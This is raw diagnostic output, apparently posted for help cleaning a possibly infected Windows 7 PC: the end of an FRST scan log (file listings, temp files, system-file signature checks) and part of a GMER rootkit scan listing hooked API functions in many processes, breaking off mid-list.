2010-06-02 06:22 - 2010-06-02 06:22 - 0273960 _____ () C:\Program Files (x86)\Nov2008_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0272611 _____ () C:\Program Files (x86)\Nov2008_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0086037 _____ () C:\Program Files (x86)\Oct2005_xinput_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0045359 _____ () C:\Program Files (x86)\Oct2005_xinput_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1412902 _____ () C:\Program Files (x86)\OCT2006_d3dx9_31_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1127217 _____ () C:\Program Files (x86)\OCT2006_d3dx9_31_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0182361 _____ () C:\Program Files (x86)\OCT2006_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0138017 _____ () C:\Program Files (x86)\OCT2006_XACT_x86.cab
2015-07-05 04:14 - 2015-07-05 04:14 - 0000911 _____ () C:\Users\Kenny G\AppData\Local\recently-used.xbel
2014-07-31 10:50 - 2014-07-31 10:51 - 0022400 _____ () C:\ProgramData\RUNDLL32.EXE-1180-F.txt
2014-07-06 17:23 - 2014-07-06 17:23 - 0244720 _____ () C:\ProgramData\RUNDLL32.EXE-12956-F.txt
2014-07-27 17:22 - 2014-07-28 13:07 - 0079618 _____ () C:\ProgramData\RUNDLL32.EXE-1384-F.txt
2014-07-10 10:53 - 2014-07-10 17:12 - 0298281 _____ () C:\ProgramData\RUNDLL32.EXE-1424-F.txt
2014-07-19 22:13 - 2014-07-20 00:37 - 0113345 _____ () C:\ProgramData\RUNDLL32.EXE-1436-F.txt
2014-07-30 09:52 - 2014-07-30 13:45 - 0181914 _____ () C:\ProgramData\RUNDLL32.EXE-1596-F.txt
2014-07-21 20:18 - 2014-07-21 22:11 - 0087977 _____ () C:\ProgramData\RUNDLL32.EXE-1788-F.txt
2014-07-18 05:35 - 2014-07-18 11:01 - 0242621 _____ () C:\ProgramData\RUNDLL32.EXE-2188-F.txt
2014-07-31 18:04 - 2014-07-31 18:05 - 0001416 _____ () C:\ProgramData\RUNDLL32.EXE-2284-F.txt
2014-07-31 10:34 - 2014-07-31 10:45 - 0008414 _____ () C:\ProgramData\RUNDLL32.EXE-2308-F.txt
2014-07-18 22:37 - 2014-07-19 01:07 - 0118602 _____ () C:\ProgramData\RUNDLL32.EXE-2348-F.txt
2014-07-28 15:20 - 2014-07-28 15:52 - 0025184 _____ () C:\ProgramData\RUNDLL32.EXE-2444-F.txt
2014-07-29 22:22 - 2014-07-29 23:10 - 0038461 _____ () C:\ProgramData\RUNDLL32.EXE-2460-F.txt
2014-07-12 11:11 - 2014-07-12 12:12 - 0048083 _____ () C:\ProgramData\RUNDLL32.EXE-2480-F.txt
2014-07-10 19:57 - 2014-07-10 20:25 - 0007207 _____ () C:\ProgramData\RUNDLL32.EXE-2584-F.txt
2014-07-29 10:41 - 2014-07-29 12:12 - 0071934 _____ () C:\ProgramData\RUNDLL32.EXE-2904-F.txt
2014-07-16 20:21 - 2014-07-17 22:12 - 0478880 _____ () C:\ProgramData\RUNDLL32.EXE-3004-F.txt
2014-07-20 08:08 - 2014-07-20 11:56 - 0181099 _____ () C:\ProgramData\RUNDLL32.EXE-3044-F.txt
2014-08-01 06:26 - 2014-08-01 13:03 - 0282818 _____ () C:\ProgramData\RUNDLL32.EXE-3108-F.txt
2014-07-10 22:41 - 2014-07-10 23:23 - 0033087 _____ () C:\ProgramData\RUNDLL32.EXE-3160-F.txt
2014-07-12 04:26 - 2014-07-12 05:10 - 0035209 _____ () C:\ProgramData\RUNDLL32.EXE-3164-F.txt
2014-07-28 18:24 - 2014-07-28 19:58 - 0074219 _____ () C:\ProgramData\RUNDLL32.EXE-3264-F.txt
2014-08-07 06:42 - 2014-08-07 09:07 - 0076563 _____ () C:\ProgramData\RUNDLL32.EXE-3272-F.txt
2014-08-12 17:39 - 2014-08-12 17:48 - 0005807 _____ () C:\ProgramData\RUNDLL32.EXE-3288-F.txt
2014-08-12 18:47 - 2014-08-12 21:55 - 0104772 _____ () C:\ProgramData\RUNDLL32.EXE-3308-F.txt
2014-08-15 13:01 - 2014-08-15 13:53 - 0017691 _____ () C:\ProgramData\RUNDLL32.EXE-3356-F.txt
2014-08-14 16:21 - 2014-08-14 18:56 - 0059067 _____ () C:\ProgramData\RUNDLL32.EXE-3396-F.txt
2014-08-16 03:06 - 2014-08-16 04:02 - 0018161 _____ () C:\ProgramData\RUNDLL32.EXE-3452-F.txt
2014-08-03 08:19 - 2014-08-03 14:26 - 0294846 _____ () C:\ProgramData\RUNDLL32.EXE-3468-F.txt
2014-08-01 13:28 - 2014-08-03 00:37 - 0583063 _____ () C:\ProgramData\RUNDLL32.EXE-3480-F.txt
2014-08-07 10:20 - 2014-08-08 02:21 - 0085411 _____ () C:\ProgramData\RUNDLL32.EXE-3500-F.txt
2014-08-16 02:53 - 2014-08-16 03:05 - 0004128 _____ () C:\ProgramData\RUNDLL32.EXE-3516-F.txt
2014-08-07 01:45 - 2014-08-07 05:13 - 0115168 _____ () C:\ProgramData\RUNDLL32.EXE-3524-F.txt
2014-08-14 11:31 - 2014-08-14 13:24 - 0035565 _____ () C:\ProgramData\RUNDLL32.EXE-3528-F.txt
2014-07-15 19:58 - 2014-07-15 21:04 - 0045897 _____ () C:\ProgramData\RUNDLL32.EXE-3548-F.txt
2014-08-15 20:50 - 2014-08-15 23:14 - 0052980 _____ () C:\ProgramData\RUNDLL32.EXE-3552-F.txt
2014-08-06 21:49 - 2014-08-06 23:29 - 0071408 _____ () C:\ProgramData\RUNDLL32.EXE-3560-F.txt
2014-08-04 05:01 - 2014-08-05 06:05 - 0508848 _____ () C:\ProgramData\RUNDLL32.EXE-3564-F.txt
2014-07-09 21:47 - 2014-07-09 23:03 - 0060832 _____ () C:\ProgramData\RUNDLL32.EXE-3576-F.txt
2014-08-12 15:19 - 2014-08-12 15:29 - 0005538 _____ () C:\ProgramData\RUNDLL32.EXE-3632-F.txt
2014-08-06 21:27 - 2014-08-06 21:30 - 0002580 _____ () C:\ProgramData\RUNDLL32.EXE-3656-F.txt
2014-08-08 03:06 - 2014-08-11 13:07 - 0049817 _____ () C:\ProgramData\RUNDLL32.EXE-3688-F.txt
2014-08-03 16:46 - 2014-08-03 20:12 - 0162566 _____ () C:\ProgramData\RUNDLL32.EXE-3716-F.txt
2014-07-26 00:51 - 2014-07-26 09:44 - 0140982 _____ () C:\ProgramData\RUNDLL32.EXE-3828-F.txt
2014-07-26 23:06 - 2014-07-31 18:22 - 0025692 _____ () C:\ProgramData\RUNDLL32.EXE-3836-F.txt
2014-07-27 01:58 - 2014-07-27 03:43 - 0082833 _____ () C:\ProgramData\RUNDLL32.EXE-3848-F.txt
2014-08-15 17:05 - 2014-08-15 18:28 - 0024905 _____ () C:\ProgramData\RUNDLL32.EXE-3900-F.txt
2014-08-05 09:40 - 2014-08-05 20:23 - 0262790 _____ () C:\ProgramData\RUNDLL32.EXE-4020-F.txt
2014-07-25 21:52 - 2014-07-28 22:06 - 0076241 _____ () C:\ProgramData\RUNDLL32.EXE-4028-F.txt
2014-07-30 03:30 - 2014-07-30 05:19 - 0086514 _____ () C:\ProgramData\RUNDLL32.EXE-4048-F.txt
2014-07-30 09:31 - 2014-07-30 09:50 - 0012645 _____ () C:\ProgramData\RUNDLL32.EXE-4088-F.txt
2014-07-21 04:57 - 2014-07-21 14:44 - 0070566 _____ () C:\ProgramData\RUNDLL32.EXE-4092-F.txt
2014-07-11 11:19 - 2014-07-11 22:30 - 0228731 _____ () C:\ProgramData\RUNDLL32.EXE-4136-F.txt
2014-07-09 10:18 - 2014-07-09 11:48 - 0071159 _____ () C:\ProgramData\RUNDLL32.EXE-4148-F.txt
2014-07-29 14:02 - 2014-07-29 20:15 - 0170297 _____ () C:\ProgramData\RUNDLL32.EXE-4196-F.txt
2014-07-26 14:42 - 2014-07-26 15:48 - 0052128 _____ () C:\ProgramData\RUNDLL32.EXE-4212-F.txt
2014-07-14 17:22 - 2014-07-14 23:13 - 0274928 _____ () C:\ProgramData\RUNDLL32.EXE-4220-F.txt
2014-07-24 16:43 - 2014-07-25 04:36 - 0333823 _____ () C:\ProgramData\RUNDLL32.EXE-4292-F.txt
2014-07-08 18:10 - 2014-07-08 19:36 - 0067558 _____ () C:\ProgramData\RUNDLL32.EXE-4304-F.txt
2014-07-15 21:56 - 2014-07-15 23:43 - 0084278 _____ () C:\ProgramData\RUNDLL32.EXE-4328-F.txt
2014-07-07 12:11 - 2014-07-07 12:11 - 0967929 _____ () C:\ProgramData\RUNDLL32.EXE-4416-F.txt
2014-07-25 04:43 - 2014-07-25 20:32 - 0390092 _____ () C:\ProgramData\RUNDLL32.EXE-4440-F.txt
2014-07-12 05:11 - 2014-07-12 05:13 - 0002034 _____ () C:\ProgramData\RUNDLL32.EXE-4444-F.txt
2014-07-22 05:15 - 2014-07-22 06:02 - 0037273 _____ () C:\ProgramData\RUNDLL32.EXE-4448-F.txt
2014-07-21 17:40 - 2014-07-21 18:08 - 0022362 _____ () C:\ProgramData\RUNDLL32.EXE-4452-F.txt
2014-07-31 17:44 - 2014-07-31 17:44 - 0000282 _____ () C:\ProgramData\RUNDLL32.EXE-4540-F.txt
2014-07-13 12:53 - 2014-07-13 14:32 - 0078792 _____ () C:\ProgramData\RUNDLL32.EXE-4584-F.txt
2014-07-07 12:12 - 2014-07-07 14:05 - 0090638 _____ () C:\ProgramData\RUNDLL32.EXE-4604-F.txt
2014-07-31 17:35 - 2014-07-31 17:38 - 0002205 _____ () C:\ProgramData\RUNDLL32.EXE-4648-F.txt
2014-07-13 18:37 - 2014-07-14 17:20 - 0170811 _____ () C:\ProgramData\RUNDLL32.EXE-4736-F.txt
2014-07-13 08:58 - 2014-07-13 12:49 - 0182356 _____ () C:\ProgramData\RUNDLL32.EXE-4744-F.txt
2014-07-16 15:41 - 2014-07-16 20:04 - 0202579 _____ () C:\ProgramData\RUNDLL32.EXE-4780-F.txt
2014-07-31 17:53 - 2014-07-31 18:02 - 0007265 _____ () C:\ProgramData\RUNDLL32.EXE-4804-F.txt
2014-07-07 20:59 - 2014-07-07 22:47 - 0084404 _____ () C:\ProgramData\RUNDLL32.EXE-4808-F.txt
2014-07-08 20:17 - 2014-07-24 15:47 - 0414838 _____ () C:\ProgramData\RUNDLL32.EXE-4840-F.txt
2014-07-22 11:02 - 2014-07-23 06:10 - 0175986 _____ () C:\ProgramData\RUNDLL32.EXE-4920-F.txt
2014-07-19 08:24 - 2014-07-20 23:01 - 0130594 _____ () C:\ProgramData\RUNDLL32.EXE-5048-F.txt
2014-07-08 20:04 - 2014-07-08 20:13 - 0007500 _____ () C:\ProgramData\RUNDLL32.EXE-5068-F.txt
2014-07-12 13:09 - 2014-07-13 00:47 - 0294315 _____ () C:\ProgramData\RUNDLL32.EXE-5072-F.txt
2014-07-26 12:36 - 2014-07-26 14:05 - 0069795 _____ () C:\ProgramData\RUNDLL32.EXE-704-F.txt
2014-08-13 09:50 - 2014-08-13 19:20 - 0161035 _____ () C:\ProgramData\RUNDLL32.EXE-780-F.txt
2014-07-30 21:15 - 2014-07-30 23:07 - 0088664 _____ () C:\ProgramData\RUNDLL32.EXE-784-F.txt
2014-07-15 10:41 - 2014-07-15 18:31 - 0370403 _____ () C:\ProgramData\RUNDLL32.EXE-808-F.txt
2014-07-06 17:24 - 2014-07-07 04:48 - 0338635 _____ () C:\ProgramData\RUNDLL32.EXE-9648-F.txt

Einige Dateien in TEMP:
====================
C:\Users\Kenny G\AppData\Local\Temp\DseShExt-x64.dll
C:\Users\Kenny G\AppData\Local\Temp\DseShExt-x86.dll
C:\Users\Kenny G\AppData\Local\Temp\newversion.exe
C:\Users\Kenny G\AppData\Local\Temp\ose00000.exe
C:\Users\Kenny G\AppData\Local\Temp\ose00002.exe
C:\Users\Kenny G\AppData\Local\Temp\ose00003.exe
C:\Users\Kenny G\AppData\Local\Temp\SDShelEx-win32.dll
C:\Users\Kenny G\AppData\Local\Temp\SDShelEx-x64.dll
C:\Users\Kenny G\AppData\Local\Temp\sqlite3.dll
C:\Users\Kenny G\AppData\Local\Temp\Uninstall.exe


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2015-09-13 22:19

==================== Ende von FRST.txt ============================
         

gmer

Code:
ATTFilter
GMER 2.1.19357 - hxxp://www.gmer.net
Rootkit scan 2015-09-20 19:29:17
Windows 6.1.7600  x64 \Device\Harddisk0\DR0 -> \Device\00000065 SAMSUNG_ rev.KF10 186,31GB
Running: Gmer-19357.exe; Driver: C:\Users\KENNYG~1\AppData\Local\Temp\fwdiipog.sys


---- Kernel code sections - GMER 2.1 ----

INITKDBG  C:\Windows\system32\ntoskrnl.exe                                                                                                                                                                                                                                 suspicious modification

---- User code sections - GMER 2.1 ----

.text     C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2580] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection                                                                                                                                  000000007730fbf0 5 bytes JMP 000000016fbc19d0
.text     C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2580] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory                                                                                                                                000000007730fdb4 1 byte JMP 000000016fbc15f0
.text     C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2580] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2                                                                                                                            000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c}
.text     C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2580] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW                                                                                                                           0000000074fd117b 5 bytes JMP 000000016fbc1760
.text     C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2580] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread                                                                                                                                   00000000750d2bbe 5 bytes JMP 000000016fbc1bb0
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection                                                                                                                                                                          000000007730fbf0 5 bytes JMP 000000016fbc19d0
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory                                                                                                                                                                        000000007730fdb4 1 byte JMP 000000016fbc15f0
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2                                                                                                                                                                    000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c}
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW                                                                                                                                                                   0000000074fd117b 5 bytes JMP 000000016fbc1760
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread                                                                                                                                                                           00000000750d2bbe 5 bytes JMP 000000016fbc1bb0
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\WSOCK32.dll!recv + 82                                                                                                                                                                                 00000000726417fa 2 bytes CALL 74fc1199 C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\WSOCK32.dll!recvfrom + 88                                                                                                                                                                             0000000072641860 2 bytes CALL 74fc1199 C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\WSOCK32.dll!setsockopt + 98                                                                                                                                                                           0000000072641942 2 bytes JMP 751ec29f C:\Windows\syswow64\WS2_32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\WSOCK32.dll!setsockopt + 109                                                                                                                                                                          000000007264194d 2 bytes JMP 751e418d C:\Windows\syswow64\WS2_32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleFileNameExW + 17                                                                                                                                                                   00000000750b1401 2 bytes JMP 74fdeb26 C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!EnumProcessModules + 17                                                                                                                                                                     00000000750b1419 2 bytes JMP 74feb513 C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 17                                                                                                                                                                   00000000750b1431 2 bytes JMP 75068609 C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 42                                                                                                                                                                   00000000750b144a 2 bytes CALL 74fc1dfa C:\Windows\syswow64\kernel32.dll
.text     ...                                                                                                                                                                                                                                                              * 9
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!EnumDeviceDrivers + 17                                                                                                                                                                      00000000750b14dd 2 bytes JMP 75067efe C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetDeviceDriverBaseNameA + 17                                                                                                                                                               00000000750b14f5 2 bytes JMP 750680d8 C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!QueryWorkingSetEx + 17                                                                                                                                                                      00000000750b150d 2 bytes JMP 75067df4 C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetDeviceDriverBaseNameW + 17                                                                                                                                                               00000000750b1525 2 bytes JMP 750681c2 C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleBaseNameW + 17                                                                                                                                                                     00000000750b153d 2 bytes JMP 74fdf088 C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!EnumProcesses + 17                                                                                                                                                                          00000000750b1555 2 bytes JMP 74feb885 C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetProcessMemoryInfo + 17                                                                                                                                                                   00000000750b156d 2 bytes JMP 750686c1 C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetPerformanceInfo + 17                                                                                                                                                                     00000000750b1585 2 bytes JMP 75068222 C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!QueryWorkingSet + 17                                                                                                                                                                        00000000750b159d 2 bytes JMP 75067db8 C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleBaseNameA + 17                                                                                                                                                                     00000000750b15b5 2 bytes JMP 74fdf121 C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleFileNameExA + 17                                                                                                                                                                   00000000750b15cd 2 bytes JMP 74feb29f C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetProcessImageFileNameW + 20                                                                                                                                                               00000000750b16b2 2 bytes JMP 75068584 C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetProcessImageFileNameW + 31                                                                                                                                                               00000000750b16bd 2 bytes JMP 75067d4d C:\Windows\syswow64\kernel32.dll
.text     C:\Windows\system32\svchost.exe[2708] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection                                                                                                                                                                           0000000077160130 5 bytes JMP 0000000177100128
.text     C:\Windows\system32\svchost.exe[2708] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory                                                                                                                                                                         0000000077160250 5 bytes JMP 0000000177100018
.text     C:\Windows\system32\svchost.exe[2708] C:\Windows\system32\kernel32.dll!CreateProcessInternalW                                                                                                                                                                    0000000076f0a600 5 bytes JMP 00000000771000a0
.text     C:\Windows\system32\svchost.exe[2708] C:\Windows\system32\KERNELBASE.dll!ResumeThread                                                                                                                                                                            000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0
.text     C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs[2748] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection                                                                                                                     000000007730fbf0 5 bytes JMP 000000016fbc19d0
.text     C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs[2748] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory                                                                                                                   000000007730fdb4 1 byte JMP 000000016fbc15f0
.text     C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs[2748] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2                                                                                                               000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c}
.text     C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs[2748] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW                                                                                                              0000000074fd117b 5 bytes JMP 000000016fbc1760
.text     C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs[2748] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread                                                                                                                      00000000750d2bbe 5 bytes JMP 000000016fbc1bb0
.text     C:\Windows\system32\taskhost.exe[3408] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection                                                                                                                                                                          0000000077160130 5 bytes JMP 00000000772c0128
.text     C:\Windows\system32\taskhost.exe[3408] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory                                                                                                                                                                        0000000077160250 5 bytes JMP 00000000772c0018
.text     C:\Windows\system32\taskhost.exe[3408] C:\Windows\system32\kernel32.dll!CreateProcessInternalW                                                                                                                                                                   0000000076f0a600 5 bytes JMP 00000000772c00a0
.text     C:\Windows\system32\taskhost.exe[3408] C:\Windows\system32\KERNELBASE.dll!ResumeThread                                                                                                                                                                           000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0
.text     C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe[3500] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection                                                                                                                                           0000000077160130 5 bytes JMP 00000000772c0128
.text     C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe[3500] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory                                                                                                                                         0000000077160250 5 bytes JMP 00000000772c0018
.text     C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe[3500] C:\Windows\system32\kernel32.dll!CreateProcessInternalW                                                                                                                                    0000000076f0a600 5 bytes JMP 00000000772c00a0
.text     C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe[3500] C:\Windows\system32\KERNELBASE.dll!ResumeThread                                                                                                                                            000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0
.text     C:\Windows\system32\Dwm.exe[3556] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection                                                                                                                                                                               0000000077160130 5 bytes JMP 00000000772c0128
.text     C:\Windows\system32\Dwm.exe[3556] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory                                                                                                                                                                             0000000077160250 5 bytes JMP 00000000772c0018
.text     C:\Windows\system32\Dwm.exe[3556] C:\Windows\system32\kernel32.dll!CreateProcessInternalW                                                                                                                                                                        0000000076f0a600 5 bytes JMP 00000000772c00a0
.text     C:\Windows\system32\Dwm.exe[3556] C:\Windows\system32\KERNELBASE.dll!ResumeThread                                                                                                                                                                                000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0
.text     C:\Windows\system32\conhost.exe[3564] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection                                                                                                                                                                           0000000077160130 5 bytes JMP 00000000772c0128
.text     C:\Windows\system32\conhost.exe[3564] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory                                                                                                                                                                         0000000077160250 5 bytes JMP 00000000772c0018
.text     C:\Windows\system32\conhost.exe[3564] C:\Windows\system32\kernel32.dll!CreateProcessInternalW                                                                                                                                                                    0000000076f0a600 5 bytes JMP 00000000772c00a0
.text     C:\Windows\system32\conhost.exe[3564] C:\Windows\system32\KERNELBASE.dll!ResumeThread                                                                                                                                                                            000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0
.text     C:\Windows\Explorer.EXE[3616] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection                                                                                                                                                                                   0000000077160130 5 bytes JMP 00000000772c0128
.text     C:\Windows\Explorer.EXE[3616] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory                                                                                                                                                                                 0000000077160250 5 bytes JMP 00000000772c0018
.text     C:\Windows\Explorer.EXE[3616] C:\Windows\system32\kernel32.dll!CreateProcessInternalW                                                                                                                                                                            0000000076f0a600 5 bytes JMP 00000000772c00a0
.text     C:\Windows\Explorer.EXE[3616] C:\Windows\system32\KERNELBASE.dll!ResumeThread                                                                                                                                                                                    000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0
.text     C:\Windows\system32\SearchIndexer.exe[3828] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection                                                                                                                                                                     0000000077160130 5 bytes JMP 00000000772c0128
.text     C:\Windows\system32\SearchIndexer.exe[3828] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory                                                                                                                                                                   0000000077160250 5 bytes JMP 00000000772c0018
.text     C:\Windows\system32\SearchIndexer.exe[3828] C:\Windows\system32\kernel32.dll!CreateProcessInternalW                                                                                                                                                              0000000076f0a600 5 bytes JMP 00000000772c00a0
.text     C:\Windows\system32\SearchIndexer.exe[3828] C:\Windows\system32\KERNELBASE.dll!ResumeThread                                                                                                                                                                      000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0
.text     C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[2236] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection                                                                                                                                   000000007730fbf0 5 bytes JMP 000000016fbc19d0
.text     C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[2236] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory                                                                                                                                 000000007730fdb4 1 byte JMP 000000016fbc15f0
.text     C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[2236] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2                                                                                                                             000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c}
.text     C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[2236] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW                                                                                                                            0000000074fd117b 5 bytes JMP 000000016fbc1760
.text     C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[2236] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread                                                                                                                                    00000000750d2bbe 5 bytes JMP 000000016fbc1bb0
.text     C:\Program Files (x86)\AVG\AVG2015\avgui.exe[3272] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection                                                                                                                                                              000000007730fbf0 5 bytes JMP 000000016fbc19d0
.text     C:\Program Files (x86)\AVG\AVG2015\avgui.exe[3272] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory                                                                                                                                                            000000007730fdb4 1 byte JMP 000000016fbc15f0
.text     C:\Program Files (x86)\AVG\AVG2015\avgui.exe[3272] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2                                                                                                                                                        000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c}
.text     C:\Program Files (x86)\AVG\AVG2015\avgui.exe[3272] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW                                                                                                                                                       0000000074fd117b 5 bytes JMP 000000016fbc1760
